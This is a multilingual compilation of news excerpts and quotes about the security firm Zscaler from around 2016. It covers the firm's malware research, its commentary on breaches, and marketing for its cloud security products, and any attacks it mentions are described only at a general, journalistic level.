While conventional wisdom says that Android has laxer security than iOS, research suggests differently: Zscaler found that more Apple iOS mobile devices are leaking information like the exact location of devices and their owners than Android. Over the past three months, millions of both device types were found to be leaking enterprise data, privacy information and unique mobile device identifications.
IT administrators, Zscaler said, “should be applying strict MDM policies and educating employees about app security in an effort to stave off any kind of data loss or security breach.” Deepen Desai, director of security research at Zscaler, said administrators need to take control of the type of apps that are allowed to be installed on devices and they need to monitor app traffic over the corporate network and enforce policies.
"Apparently, the authors are taking advantage of the popularity of both the elections, to lure the victims, and the Cryptowall ransomware strain to scare the victims into paying," said Deepen Desai, Zscaler's director of security research.
“In recent cases, remote execution vulnerabilities in the Magento ecommerce Platform were exploited, which ultimately resulted in admin access to servers, and the opportunity for code manipulation and the installation of malware," Chris Hodson, CISO EMEA at Zscaler.
C’est pourquoi, il est nécessaire de créer un périmètre efficace autour de l’Internet pour protéger les collaborateurs, quel que soit l’endroit où ils se trouvent et le terminal qu’ils utilisent. Les règles de sécurité mises en place par l’entreprise au sein de son château fort doivent être aussi mobiles que ses utilisateurs.
In an alert this week, security vendor Zscaler urged Internet users to be extra cautious about the sites they visit and the actions they take online to mitigate the threat from heightened election-related criminal campaigns. ‘They’re using this drama-filled election season as a backdrop for campaigns of their own,’ Zscaler security researcher Sameer Patil warned in the blog.
Hackers are using the hyper-partisan 2016 presidential election to launch new cyberattacks, according to new research from digital security firm Zscaler. The firm uncovered numerous adware campaigns where web ads promising bombshell news about the candidates trick users into clicking malware-laden links. One jaw-dropping example shows Donald Trump lying dead due to heart attack. Another infects the tricked user’s computer with a ransomware program that encrypts the victim’s files until a ransom payment is made.
The record breaking fine imposed on TalkTalk is merely a drop in the ocean. If the breach was to take place after GDPR had been enforced, the severity of the penalty would have been significantly more damaging. With the risk of personal information reaching the public domain, organisations need to step up and ensure that they are accountable for personal data,” said Chris Hodson, CSIO for EMEA at Zscaler.
Citrix announced a partnership with cloud-based security vendor Zscaler Inc. Citrix provides integration with the Zscaler gateway that provides URL filtering, firewall protection and other security features for all branch-office traffic between NetScaler SD-WAN and the public internet.
Durch einzelne "Best-of-Breed"-Komponenten entsteht also nicht zwingend eine herausragende Sicherheitsinfrastruktur. Als Handlungsempfehlung ergibt sich daraus, dass Unternehmen ihren Auswahlprozess für eine Lösung auf Basis der strategischen Ziele als Top-Down Assessment starten und Entscheidungen nicht mehr auf Ebene einzelner Komponenten gefällt werden sollten.
Um einen reibungslosen Umstieg auf die Cloud vorzubereiten und auch das nötige Anwendererlebnis in der Cloud zu gewährleisten, müssen Unternehmen in einem ersten Schritt allerdings oftmals ihre IT-Netzwerkarchitektur und Internet-Sicherheit überdenken. Denn mit herkömmlichen Hub & Spoke-Modellen für den Datenverkehr kann es schnell zu verstopften Leitungen kommen angesichts des neuen Datenaufkommens durch die Cloud.
“Such a broad directive suggests that the intelligence community needed to cast a wide net, which likely included other providers," Michael Sutton chief information security officer at cybersecurity firm Zscaler said. Unfortunately, the very process of such directives precludes transparency and prohibits others from even revealing the existence of such a request.
“The record breaking fine imposed on TalkTalk is merely a drop in the ocean. If the breach was to take place after GDPR had been enforced, the severity of the penalty would have been significantly more damaging. With the risk of personal information reaching the public domain, organisations need to step up and ensure that they are accountable for personal data,” said Chris Hodson, CSIO for EMEA at Zscaler.
“Businesses are looking to adopt cloud and mobile-first strategies to improve the agility and productivity of their workforce,” Andy Kennedy, Sales Engineering Manager, UK & Ireland at Zscaler said “Backhauling traffic to the datacentre to carry out security checks flies in the face of that strategy, slowing down network performance and ramping up bandwidth costs.”
Michael Sutton, le directeur de la sécurité de Zscaler (une entreprise spécialisée en cybersécurité), fait le même constat : selon lui, comme les agences de renseignement ne parviennent pas à casser le chiffrement, « elles n’ont pas d’autre choix que de monter des partenariats avec les fournisseurs de services. Je pense que nous allons voir d’autres programmes du type de celui de Yahoo, car le renseignement ne peut plus travailler seul ».
“While the Reuters story, if it is accurate, "may at first blush seem to be another black eye for Yahoo on the privacy front," Michael Sutton, CISO at Zscaler, in a statement emailed to SCMagazine.com, urged that "we shouldn't be quick to rush to judgement or single out Yahoo. It's unlikely that Yahoo alone received the classified U.S. government directive to search all incoming email messages."
“Kommerzielle Keylogger sind vielseitig einsetzbare Werkzeuge für den Datendiebstahl, mit denen Kriminelle ihren Opfern so viele Daten wie möglich entwenden.” Deepen Desai, Zscaler
“They can't defeat the encryption, so they really have no choice but to make the service provider their partner in this,” said Michael Sutton, CISO at security firm Zscaler. “I think you are going see more programs like this because the intelligence community can't do this on its own."
“With no technical details included in Yahoo’s report about how the data was exfiltrated, just that it was, it’s impossible to assess credibility of the ‘state sponsored’ claim. It might well be that Yahoo has had support from government departments and that attribution has been possible but equally, ‘state-sponsored’ is often prefixed to ‘actor’ in an effort to suggest sophisticated and surreptitious means of data exfiltration. We simply do not know,” Chris Hodson, CSIO for EMEA at Zscaler said.
"[Yahoo] CEO Marissa Mayer may have had knowledge of a breach as early as July, yet did not disclose details to regulators and investors until last week. If true, Yahoo-acquirer Verizon is no doubt asking a lot of questions right now," Michael Sutton, CISO of Zscaler Inc., based in San Jose, Calif., wrote in a blog post. Such information is clearly of great importance during a due-diligence process, and yet as recently as September 9 in a regulatory filing with the [Securities and Exchange Commission], Yahoo claimed no knowledge of any data breaches.
"With no technical details included in Yahoo's report about how the data was exfiltrated, just that it was, it's impossible to assess credibility of the 'state sponsored' claim," Chris Hodson of enterprise security firm Zscaler said.
“There are the countries who actively fund organised groups. But there is also state-aware hacking where governments know it's going on but, potentially for their own benefit, there is a plausible deniability. However the targets of some of these cases are key. If you look at motive, there was a lot of scandal around Russian doping before the Olympics and then around a month or two later there was a large data breach of the doping association,” says Chris Hodson, from cyber security company Zscaler.
With no technical details included in Yahoo’s report about how the data was exfiltrated, just that it was, it’s impossible to assess credibility of the ‘state sponsored’ claim. “It might well be that Yahoo has had support from government departments and that attribution has been possible but equally, ‘state-sponsored’ is often prefixed to ‘actor’ in an effort to suggest sophisticated and surreptitious means of data exfiltration. We simply do not know,” Chris Hodson, EMEA chief information security officer at enterprise security firm Zscaler said.
"Burning questions still need answers," said Chris Hodson, an expert at cybersecurity firm Zscaler, which has worked with everyone from the UK's National Health Service (NHS) to the United States Marines. "With no technical details included in Yahoo's report about how the data was exfiltrated, just that it was, it's impossible to assess credibility of the 'state sponsored' claim without this," he said. In this instance, we can only speculate that the 'state sponsored actor' claim was made with a view to placating the general public.
Internet security platforms like Zscaler offer IoT devices protection against security breaches with a cloud based solution. You can route the traffic through the platform and set policies for the devices so they won’t communicate with unnecessary servers.
“If you look back five years to get into the cybercrime market you had to have a level of technical skill, you had to have the funding for infrastructure components for the likes of ransomware or APT [Advanced Persistent Threats]. Now there are these affiliate schemes – or what I am calling ‘cybercrime as a service’ – where we are seeing that the barrier for entry is no longer what it was way back when. That is causing this proliferation of criminals who are coming to the market,” Chris Hodson, CSIO for EMEA at Zscaler said.
“Overall, we are seeing a rise in malicious activity involving commercial keyloggers, which makes it very easy for a naive user with malicious intent to conduct successful attacks,” said Deepen Desai, director of security research at Zscaler.
"iSpy keylogger contains advanced keylogger functionality to steal information, monitor the target user's system activity via screenshots, and act as a surveillance system for criminals by capturing video through an infected system's webcam,” says Deepen Desai, director of security research at Zscaler.
“This extradition ruling could well be setting a new precedent for cyber-crime convictions. The penalties for cyber-crime have historically been disproportionate to in-person crime. However, this verdict could see that change, as cyber-crime is now more frequent and more damaging to nation states and businesses than ever before,” Chris Hodson, CISO EMEA at Zscaler said.
“By its very nature, hacking and online crime is complex and difficult to track, making attribution a tricky area for authorities. Even more so, when it comes to organized, financially-motivated criminal syndicates. The real challenge for courts and nation states is how they catch and prosecute the organized criminal syndicates that consistently cause economic loss and political havoc.”
By its very nature, hacking and online crime is complex and difficult to track, making attribution a tricky area for authorities. Even more so, when it comes to organized, financially-motivated criminal syndicates. The real challenge for courts and nation states is how they catch and prosecute the organized criminal syndicates that consistently cause economic loss and political havoc.
"Boards are holding CISOs accountable,” Michael Sutton, CISO with cloud-security vendor Zscaler, recently told CSO Australia. “That's a positive thing because the role of the CISO is getting elevated — but not every CISO will survive that transition. The back-office technologist who doesn't know how to deal with the business side, is never going to survive.”
“Zscaler is growing, and so is its team, with the announcement that Chris Stephens will now become the company's senior marketing manager for the Asia Pacific region.”
“Often the demographics of an individual like [Guccifer] are male, young, highly intelligent. And the fact that they are getting recognition for their success continues to fuel them,” Sutton said.
Face à cette pénurie de compétences, les DSI et les chefs d’entreprise doivent externaliser les mécanismes de protection et de sécurité. Alors que les applications quittent les datacenters au profit du Cloud, la meilleure approche consiste à déployer des mesures de sécurité qui fonctionnent également sur le nuage
Chris Hodson, EMEA CISO at Zscaler, told SCMagazineUK.com that in the case of Gugi, social engineering is coming via a spam SMS message. "Security professionals have a duty of care to educate users. SMS messages from an unknown number should always be treated with caution," he said.
Researchers at Zscaler recently discovered a new spyware campaign that used cybersquatting techniques to host, distribute and command-and-control the AgentTesla keylogger via a domain whose name was strikingly similar to Chesapeake, Virginia-based consulting and services firm Diode Technologies.
Wir empfehlen daher einen ganzheitlichen Ansatz, dessen Sicherheitsmodule intelligent zusammenspielen. Wichtig ist, dass alle Daten in Echtzeit korreliert und automatisch auf Schadcode-Muster analysiert werden. Dazu zählen nicht nur die innerhalb des Unternehmensnetzes generierten Daten, sondern auch die mobiler Nutzer, der IoT-Geräte und aller Zweigstellen
Zscaler said that it first learned about the keylogger when it landed in a customer’s cloud sandbox and was flagged for review. Upon further analysis, the company learned about the attackers’ cybersquatting tactics that were used to deliver the malware.
Seit Anfang August beobachten die Analysten des Threatlabz Teams von Zscaler eine neue Welle an Aktivität des Android Marcher Trojaners - seit 2013 ein alter Bekannter - der nun mit einer neuen Masche auf Bankinformationen argloser Anwender abzielt. Frühere Marcher-Varianten wurden als gefälschte Apps über den Amazon oder Google Play Store verbreitet.
Wir erleben viele Infektionsversuche dieser Malware-Familie in unserer Cloud. Diese häufigen Änderungen weisen auf eine aktive Malware-Entwicklung hin, die sich stetig verändert – was es zur häufigsten Bedrohung für Android-Geräte macht.
Das haben wir bei bösartigen Android-Applikationspaketen in letzter Zeit öfter beobachtet, dass sie Scareware-Taktiken verwenden und der User per Pop-up einen Hinweis erhält, sein Gerät sei infiziert. Das angebliche Update verspricht dann eine Säuberung des Geräts.
A site page serving the malware attempts to scare potential marks by showing that the device is vulnerable to viruses, inviting them to install a "fake" update to prevent future data theft. The tactic represents a change of tack by cybercrooks behind the scam, who previously spread the nasty through Amazon and Google Play store apps, cloud security firm Zscaler reports.
With the growing security concerns around mobile malware, this distribution is an attempt to lure users into downloading fake mobile firmware updates to infect their device. There's a bit of irony here too – users think they are downloading an update to protect their device, when in fact it's actually a malicious application designed to cause harm.
Manufacturers are looking for hardware components which are affordable and increase profit margins. Cheap, lightweight components in IoT devices often lack the capability to provide fundamental security services, such as encryption, as its hardware simply cannot support it.
Zscaler has labelled Marcher "the most prevalent threat to the Android devices" due to the constantly evolving nature of the malware. The best way for Android users to avoid falling victim to Marcher is to only download applications from trusted application stores such as Google Play, and not downloading anything from unknown sources.
While it may seem easier to simply blanket ban any live coverage during working hours, this will only leave employees feeling demotivated and encourage them to look for other means of viewing events. In turn, this could result in an increase in absence from the office and leave employees open to social engineering attacks, as their vigilance is lowered as they look for alternative means to stream events.
Zscaler was bashing the competition – literally – at Black Hat 2016. The cloud security company had set up a booth where attendees could suit up and take a hammer to security appliances, highlighting its own 100 percent cloud-based internet security solutions.
“At previous Games, Zscaler found that 80 percent of Olympic web domains were found to be scams and spams. This is an easy win for cyber-criminals, so I expect Phishing to be ripe again in 2016,” says Chris Hodson, CISO EMEA at Zscaler.
[Companies] are getting that advice from law enforcement. They have gone on record saying you are better off paying. The thing is if we did the basics, we wouldn’t be in that situation in the first place.
When you look at the way that stuff has been done in the past, companies have always used a VPN and the problem with a VPN is that it includes the letter ‘N’ which is ‘Network’ — it is a Virtual Private Network. Basically I have a client which runs on my machine and that creates a network tunnel and places me as a roaming user on that network. So I might only need to access one application but I have access to the entire network.
“En este tipo de eventos, es común también acceder a sitios de venta de boletos falsos u ofertas de boletos gratuitos. Y este tipo de acciones pueden llevarse a cabo desde los equipos de cómputo de la empresa o desde un dispositivo personal que utiliza la red empresarial. Por ello, Zscaler aconseja que las organizaciones se aseguren de identificar los sitios de phishing y detectar scripts en páginas web que podrían ser maliciosas.”
“In den vergangenen Jahren hat das Threatlabz Team von Zscaler festgestellt, dass 80 Prozent aller „olympischen“ Webseiten betrügerisch waren oder Spam beinhalteten, wie ap-verlag.de berichtete. Grund genug, dass Unternehmen besonders aufmerksam sein sollten. Die Risiken verbergen sich in Phishing und Malware-Attacken sowie in mobilen Applikationen.”
While the business and security implications around the Games should not be taken lightly, many of the tactics cybercriminals will be using to target unsuspecting users are unlikely to be anything new. Defence in depth is of the utmost importance and businesses need to be extra vigilant when it comes to advanced security threats this August.
Businesses need to ensure that they are able to identify phishing sites and detect scripts which are running in webpages which could be malicious. Relying on URL filtering and reputation off-site is no longer an appropriate cybersecurity defense framework. Streaming sites should be enabled on a whitelist-only approach.
Protection and productivity should be at the forefront for business leaders across the world in the run up to the Games. In the last few years we’ve seen cybercriminals using spam emails and scam websites mirroring legitimate sites to entice users to click on, and download malicious files. This year’s events host similar risks and we should expect similar techniques from those trying to exploit users.
Although this threat is targeted toward end users rather than organizations, if it is a corporate issued mobile device then it may cause financial loss to the organization as well,” said Deepen Desai, director of security research at Zscaler.
The truth is that although security measures may work, industry professionals can’t set them and forget them — or operate under false assumptions. Only when security professionals become aware of what they don’t know, can they start asking the right questions and implementing the right security controls.
CISOs are increasingly worried that cloud computing and data loss go hand-in- hand. This does not have to be the case, but it is all too common. Business stakeholders are demanding the cost and elasticity benefits of cloud, and we need to make sure that a core set of security capabilities exist to support cloud adoption.
“Cloud is not a trend. That’s for sure. It’s here to stay. Companies want to have control over their security but they don’t want to be in the business of managing owning, maintaining boxes,” Sutton said.
More warnings about Pokemon Go, this time via Zscaler ThreatlabZ. In a blog post out today, researchers found an Android SMS Trojan disguised as the Pokemon Go app, which once downloaded secretly sends SMS to premium numbers costing the victim money, as well as malware that downloaded an autoclicker onto the phone that opens several pages and clicks on advertisements.
In speaking with SCMagazine.com, Amit Sinha, CTO and EVP of engineering and cloud operations at Zscaler, said the flaw is a ‘major vulnerability’ affecting all Mac users. ‘Any application that is installed on the Mac App Store has full access’ to the persistent cookies stored unencrypted in Safari's cookie store.
Zscaler discovered a vulnerability in Apple's recent OS X version (El Capitan), which enabled applications that did not have the appropriate privileges to access cookies stored in the Safari browser.
“As with most attacks, user awareness plays a huge part. The malware in question was not digitally signed. A vigilant user could have picked this up although it is more realistic to expect the organization to block the running of unsigned executables,” Zscaler EMEA CISO, Chris Hodson said.
“This access could result in a malicious application lifting all the persistent cookies for a given user and accessing sites posing as that user,” Zscaler said. In the case of email, it could result in a malicious application getting access to all your email. Worse, it could gain access to a site that stores more personal and confidential information about you.
Zscaler has found ransomware on the South African Gymnastics Federation and suggests it is a sign of things to come as interest in the Olympics heats up and sports fans search for live streams, tickets and other information. "As we get closer to the event, we expect to see a rise in threats and scams leveraging Olympics topics to target a large number of victims," it said.
The biggest problem of typical VPN deployment is opening the entire network for the user - not just to a few required applications. The more the network is increased through a VPN tunnel, the more potential security holes can occur.
Security researchers at Zscaler ThreatLabZ reckon the miscreants behind Sundown have accelerated the evolution of what started out as a fairly rudimentary exploit kit since the beginning of 2016. The crooks behind Sundown used stolen code from the rival RIG exploit kit for a short time before subsequently knitting together their own code, security researchers at cloud security firm Zscaler ThreatLabZ report.
Michael Sutton opens the feature with an overview of the culture change and the threat landscape’s impact on roles (this follows an interview between Michael and Tony Morbin last month).
For me curiosity is one of the more important characteristics to nurture for innovation. In my experience it’s important to encourage that sense of curiosity in each and every team member through the open sharing of new ideas. Nothing is ever a bad idea, it might get shot down quickly if it doesn’t meet the requirements but you can’t encourage innovation without an open flow of ideas.
The world of IT security has undergone tremendous transformation, sparked by the consumerisation of the enterprise, the adoption of cloud computing, the ubiquity of mobile and BYOD devices and the evolution of threats, which are more serious today than they have ever been before.
Ransomware authors are changing their methods according to their target. It’s no longer the stray individual that is under attack, but corporate PCs, mobile devices and even servers. Why lock and/or pilfer a person’s files worth hundreds when corporate data is infinitely more valuable?
Last September Zscaler discovered a nasty piece of Android ransomware in the form of the Adult Player app. That app had to be accessed from non Google sites, and offered pornographic videos. But in reality, when it was opened, it secretly took pictures of the user with the phone’s front-facing camera, before the device was locked and displayed a demand for $500 (£330).
In the case of CCTV, price-point is also imperative. Manufacturers are looking for hardware components which are affordable and increase profit margins. Cheap, lightweight components in IoT devices often lack the capability to provide fundamental security services, such as encryption, as its hardware simply cannot support it. How many anti-malware products have been released for our IoT devices? Very few, if any.
Making a decision between one [managed security service] provider or another is not something that should be left to mainstream IT today. A dedicated security professional is needed to understand, interact, manage and monitor service providers.
A comment by Zscaler about Shadow IT, why it is not a solution to simply block applications and solution approaches.
Chris Hodson comments on the discovery of a new CCTV botnet. He asserts that IoT botnets are increasing because IoT-enabled devices are everywhere and the security development lifecycle for IoT devices is often expedited or bypassed due to strict deadlines around time to market or the cost of the hardware.
The lack of technical skills in-house restricts the freedom in which organizations can customize and manage their own security infrastructures. Instead, they have no choice but to look externally for assistance from consultants and managed service providers.
Die Verantwortlichen in Unternehmen haben daher die neue Aufgabe, auch Zweigstellen und mobile Mitarbeiter so gut wie möglich abzusichern. Allerdings ist die Einrichtung von Hardware-basierten Firewalls in jedem Branch-Office teuer, steigert die Komplexität und geht meist mit untragbarem Verwaltungsaufwand für die nötigen Upgrades einher.
Recently the attack vector is focusing more on the user side. Now the attackers are leveraging Office Documents with social engineering tactics. What will happen is if you open a malicious document that contains an embedded macro, you will see a security warning from Microsoft Office that says this document contains a macro. Basically it’s preventing you from getting infected. What hackers are now doing is they are saying that this content is protecting and if you want to view this content you will have to enable the macros.
Le ransomware est une menace qui se propage très rapidement sur les réseaux et sa spécificité est le chiffrement. C’est pourquoi l’analyse et la régulation des certificats SSL doivent faire partie de la stratégie sécuritaire de l’entreprise. Aujourd’hui, 25% du trafic internet utilise le protocole SSL et la plupart des entreprises ont confiance en ce protocole de sécurité et préfèrent allouer leurs ressources à l’analyse du trafic non chiffré. Cela équivaut à fermer sa maison avec une porte blindée mais laisser la fenêtre du salon ouverte.
L’app apparaît comme étant celle de la banque Sberbank et demande des privilèges administrateurs une fois installée, comme indiqué ci-dessous : l’équipe Zscaler a tenté d’installer l’application originale Sberbank à partir du Play Store Google, et il est difficile de différencier l’app malveillante de l’originale. Pour respecter notre travail, merci de ne reprendre que l'intro. Pour lire la suite de cet article original direction.
Mais les DSI et les RSSI ne doivent pas pour autant interdire les applications cloud dans leur globalité : ils peuvent trouver des moyens empêchant la création de ces failles. Pour rester à la page, les services informatiques doivent passer du dilemme « bloquer ou autoriser » à une approche de type « gérer et surveiller ».
Based in San Jose, Calif., Zscaler offers a cloud security solution that preserves the user experience, while boosting web and application security with a cloud-based firewall proxy architecture that acts as a single virtual proxy to the web. This security-as-a-service approach helps drive better web, application, cloud and mobile security for customers. The solution can act as a CASB between users and cloud applications, inspecting traffic for malware and threats, as well as providing secure access capabilities.
Die integrierte Security Plattform von Zscaler liefert ganzheitlichen Schutz und beste Performance dank Advanced Threat Protection, Bandbreitenmanagement, Remote Access, Next Generation Firewall und Web Security. Dieser Ansatz geht wesentlich weiter und schützt damit alle User, Branch Offices und die Unternehmenszentrale völlig ohne den Einsatz von Hardware am Perimeter.
Symantec may have not made the best call in terms of its choice in Blue Coat. Blue Coat lies in the web gateway security space with several faster-growing, smaller competitors like Zscaler, CipherCloud, Skyhigh and Cloudlock.
Scott Robertson, vice-president, Asia Pacific and Japan, Zscaler, has a different view. "While Symantec’s intent to buy Blue Coat validates the need for secure web gateway solutions, it does not align with where the market is going because it is essentially just a consolidation of the old paradigm – legacy appliances and on-premise software. With a distributed mobile workforce moving data and applications to the cloud, neither endpoints nor appliances are enough to keep enterprises secure today. The only viable way forward is a purpose-built cloud security platform to eliminate the need to buy, deploy and manage security appliances.
This article describes the increased use of malicious executables, a trend identified by Zscaler’s research team, ThreatLabZ. In addition to the rise in delivering executable payloads, cyber criminals are adding newer anti-VM and anti-analysis techniques to the malicious documents themselves, thereby protecting the end executable payloads from being downloaded and detected by automated analysis systems.
Pour la sixième année consécutive, Zscaler, spécialiste de la sécurité sur Internet, est le leader du Magic Quadrant de Gartner dans la catégorie des passerelles web sécurisées (Secure Web Gateways).
Zscaler, the leading cloud security provider, announced it has been named Leader by Gartner, Inc. in the 2016 Magic Quadrant for Secure Web Gateways. The report evaluates vendors on their “ability to execute” and “completeness of vision.” This is the sixth consecutive year that Zscaler has been recognised as a Leader amongst security providers.
Für letzteren hat Blue Coat im November 2015 den Spezialanbieter Elastica für 280 Millionen Dollar übernommen. Durch die Integration von dessen Cloud Application Security Broker (CASB) wollte der Spezialist für Unternehmenssicherheit das Portfolio vor allem für Cloud-Szenarien erweitern. Er reagierte damit offensichtlich auf den Druck durch Firmen wie Zscaler, die die Absicherung diverser und komplexer Cloud-Nutzungszenarien besser beherrechen und in den Vordergrund stellen.
The researchers noticed that a recent wave of malicious Microsoft Word documents were evading automatic analysis by using anti-virtual machine and anti-sandboxing techniques. Securityresearchers tend to use VMs or other types of sandboxes to protect their systems when analyzing files or malware code.
Zscaler said that attackers are now making use of macros, which of course are pieces of code embedded inside Microsoft Office documents (usually written in Visual Basic). Microsoft Office disables macros by default, but attackers are now apparently ‘using clever social engineering tactics to lure the user into enabling the macros.
Macro malware became almost extinct after Microsoft disabled VBA macros by default in Office applications,’ several years ago, says Deepen Desai, director of research at security vendor Zscaler. However, with modern attacks increasingly targeting end users and endpoint systems, there has been a steady resurgence in the use of macro malware, Desai told Dark Reading.
The malware author makes an assumption here that most clean virtual environment snapshots will be taken after a fresh Microsoft Office install with probably one or two document files opened for testing the installation,’” Desai said. “’Alternately, a standard user system with Office applications should have at least 3 or more recently accessed document files
This week, security firm Zscaler published a report on Android malware that's disguised as the official Sberbank mobile banking app. […] The app demonstrates one way that hackers have been tricking banking customers into revealing their access credentials, thus allowing attackers to drain their accounts.
The arrests were announced the same day researchers at security company Zscaler disclosed their analysis of a malicious Android application posing as the Sberbank mobile app. The malicious app steals credentials and requests extensive privileges on compromised devices. The app is worrisome because it can steal SMS messages and monitor incoming calls, two avenues by which banks send one-time passwords and PINs used as a second authentication factor.
Zscaler is a high-growth technology company which is focused on bringing cloud computing to internet security. It protects more than 15 million users at more than 5,000 of the world’s leading enterprises and government organizations worldwide against cyber-attacks and data breaches, while staying fully compliant with corporate and regulatory policies.
“What advice would you give to a new CISO standing in front of the board for the first time?”
“You have to be able to translate your world into theirs. You’re in a world with technical risk – we had this many incidents and this many computers were infected. You need to translate that into language the board can understand. For example – you had 20 infections on computers. What does that mean to them? But it’s straightforward to translate that. We had this many breaches that caused this much downtime and resulted in this much productivity loss. That’s something the board can understand.”
“In order to offer security as a service ZScaler has built its own cloud hosted in data centres around the world – two are in Australia. As Sutton explains; “You always access everything through the internet…now you go through us to get there. The security challenge is that the security model of old is broken – it looked for bad things.” But, he said that there were gaps in visibility of bad things because of the uptake of public cloud, BYOD and mobile devices.
“Rather than prohibiting applications, CIOs and CISOs must find alternative ways to close the gaps. To keep pace, IT must go from ‘block or allow’ to ‘manage and monitor.’ It’s all too easy for businesses to feel overwhelmed at the new technology coming to the market, or new consumer apps penetrating the workplace.”
Charles Milton, Director of EMEA channels at Zscaler, flags up a couple of trends that are impacting on the footprint of the company’s cloud security application: “There is obviously increased mobility and cloud apps. From our point-of-view a lot of projects are driven by the adoption of major corporate cloud apps, leading to people transforming networking and the way they do business, and therefore their perception of security – things like Office 365, salesforce.com.
Der Internet Security Spezialist Zscaler stellt dem traditionellen VPN-Konzept einen neuen Cloud-basierten Ansatz entgegen: Zscaler Private Access (ZPA). Auf Basis seiner globalen Cloud-Security-Infrastruktur wird eine Remote-Verbindung von einem bestimmten Anwender zu einer spezifischen Applikation möglich, ohne den Zugriff auf das gesamte Netzwerk zu öffnen.
Cela comporte toutefois des risques… Preuve en est que la société Zscaler, spécialisée dans la sécurité des systèmes informatiques, reporte qu’un nouveau spyware se propage dans les mises à jour d’application Android de ces magasins en se faisant passer pour une nouvelle version de Chrome en version mobile.
In April, security researchers at Zscaler came across malware that targets a specific bank and steals user credentials. This infostealer Trojan seems to be Spanish in origin, and so far has targeted users in the U.S. and Mexico.
Zscaler offers several different products on its platform that are all focused on cloud security. The Cloud Firewall product handles aggregate traffic at over 100 million sessions per second and provides native SSL inspection. One of the strengths of Zscaler's offerings is that it inspects every byte of traffic, so it should be easier to see and control the applications that are in use in the organization.
new malware strain has been uncovered that steals information through phishing and by imitating bank webpages. According to Zscaler researchers, it tracks for certain URLs—including those for Mexico’s second largest bank, Banamex—in order to intercept the websites and replace them with proxies.
L’équipe de recherche en sécurité de Zscaler a détecté une activité importante dans le cloud liée à un malware voleur d’information infostealer se déguisant en mise à jour de Google Chrome. Ce malware est capable de récupérer l’historique des appels, les données SMS, l’historique de navigation ainsi que les informations bancaires, pour les envoyer à un serveur C&C. Il est, par ailleurs, à même de détecter les antivirus installés et de les neutraliser pour éviter d’être repéré.
Zscaler Private Access ermögliche es durch die zugrunde liegende Zscaler-Cloud-Infrastruktur gleichzeitig auf interne Anwendungen im Netzwerk sowie auf Apps im Cloud-Rechenzentrum des Unternehmens zuzugreifen. Eine solche flexible Zugriffsoption sei bei klassischen VPNs nur über eine kostentreibende Umleitung des Datenverkehrs durch das unternehmenseigene Rechenzentrum möglich. Im Unterschied dazu erlaube Zscaler Private Access dem Anwender einen schnellen und automatisierten Zugriff auf seine intern oder extern gehosteten Anwendungen – der Datenverkehr werde durch die Zscaler Security Cloud gesichert.
Dans son nouvel article de blog, l’équipe de recherche en sécurité de Zscaler a détecté une activité importante dans le cloud liée à un malware voleur d’information « infostealer » se déguisant en mise à jour de Google Chrome. Ce malware est capable de récupérer l’historique des appels, les données SMS, l’historique de navigation ainsi que les informations bancaires, pour les envoyer à un serveur C&C. Il est, par ailleurs, à même de détecter les antivirus installés et de les neutraliser pour éviter d’être repéré.
When this malware is installed, the data that it can potentially steal is transferred to a remote C2 (command & control server). As per the analysis of Zscaler, this malware can also detect and even terminate any antivirus app that is installed on the target computer. In fact, it is so resilient that the victim cannot delete it permanently from the device unless factory resets action is performed.
London-based communication service provider BT is plugging access points from security vendor Zscaler into its global network for better application performance over secure Internet connections. Zscaler's access points will act as a series of traffic checkpoints between businesses and the public Internet to identify and block potential threats, according to BT. The new service, Assure Managed Cloud with Zscaler, will provide real-time protection by scanning and filtering all network traffic, including SSL-encrypted sessions, the provider said.
A fake malicious Chrome update is being actively pushed onto Android users, saddling them with information-stealing malware that can be uninstalled only by restoring the device to factory settings – and losing data in the process. “Once installed, this infostealer cannot be removed from the phone as the malware does not allow the user to deactivate it’s administrative access. The only option to remove this malware is a factory reset which leads to further data loss,” Zscaler researchers have discovered.
Cloud security vendor Zscaler Inc. is hoping to unseat the Virtual Private Network (VPN) in the enterprise world. Traditionally, organizations provide remote access to corporate apps via a VPN in order to protect their networks from remote attacks, but VPNs can be a tricky beast to use. Zscaler’s alternative is something called Zscaler Private Access, a new service that allows organizations to provide access to internal apps and services while ensuring they are secure, without any sign of a VPN.
There's a new piece of nasty Android malware floating around that Android users should be on the lookout for. Masquerading as a update for Google's mobile Chrome browser, the malware is hosted on webpages designed to look like they are official Google or Android landing pages. Originally spotted by the security firm Zscaler, the malware is designed to monitor call logs, browser history, text messages and banking information. Once installed, the malware logs the aforementioned data and sends it all back to a remote command and control server. What's more, Zscaler notes that the malware is capable of checking if a user has any antivirus apps installed, and if so, "terminating them to evade detection."
Dès lors, Zscaler se propose de « découpler les applications du réseau physique pour offrir un accès granulaire, par utilisateur, aux applications et services sur le réseau interne, dans le centre de calcul, ou dans un cloud public ». Il s’agit en fait de mettre en place un tunnel, via l’infrastructure Cloud du prestataire de service, entre le poste client et l’actif du système d’information auquel il cherche à accéder, le tout sans connexion directe. Ce tunnel est chiffré et évite, accessoirement, d’exposer ouvertement une adresse IP ou un serveur dédié sur Internet.
Zscaler Private Access
ZPA, built on Zscaler’s cloud, delivers per-user application access, for apps in the datacenter, public cloud or both. Unlike VPNs, users are never “on-net,” and can only see authorized apps.
Auf eine neue Android-Malware, die Bankdaten und andere private Daten stiehlt, hat jetzt Zscaler hingewiesen. Die Schadsoftware tarnt sich als Update für den Browser Chrome und wird nicht von einer einheitlichen, sondern einer ganzen Reihe unterschiedlicher URLs gehostet, die mit Namensbestandteilen wie “android-update” oder zumindest “goog” einen offiziellen Eindruck erwecken sollen. Sie sind jeweils nur kurz aktiv und werden dann, um eine URL-basierte Erkennung zu verhindern, gewechselt.
Director of Security Research at Zscaler, Deepen Desai, was interviewed by ZDNet and he said that “The malware may arrive from compromised or malicious websites using scareware tactics or social engineering.” Users are advised to stay away from dubious websites and to no click OK no matter how tempting it is. Desai added that “One common theme we have seen in recent malicious android application packages involves scareware tactics where the user will see a popup indicating that their device is infected with a virus and asks them to update to clean up infection.”
ZScaler points out that established anti-viruses, such as ESET, Kaspersky and Avast are vulnerable to the attack and stop working as soon as the admin rights are provided to the malicious software. After the malware takes out your anti-virus program, the info-thief starts its work. The fake Chrome will track the full list of calls and texts and forward the list to a command-and-control server.
“We are seeing many new URLs dropping this malware actively in the wild. Such infection of the victim’s device leads to critical information leakage like credit card details, SMS and call logs – which can further lead to financial banking fraud,” Zscaler said. “Once installed, this Infostealer cannot be removed from the phone as the malware does not allow the user to deactivate its administrative access. The only option to remove this malware is a factory reset, which leads to further data loss.”
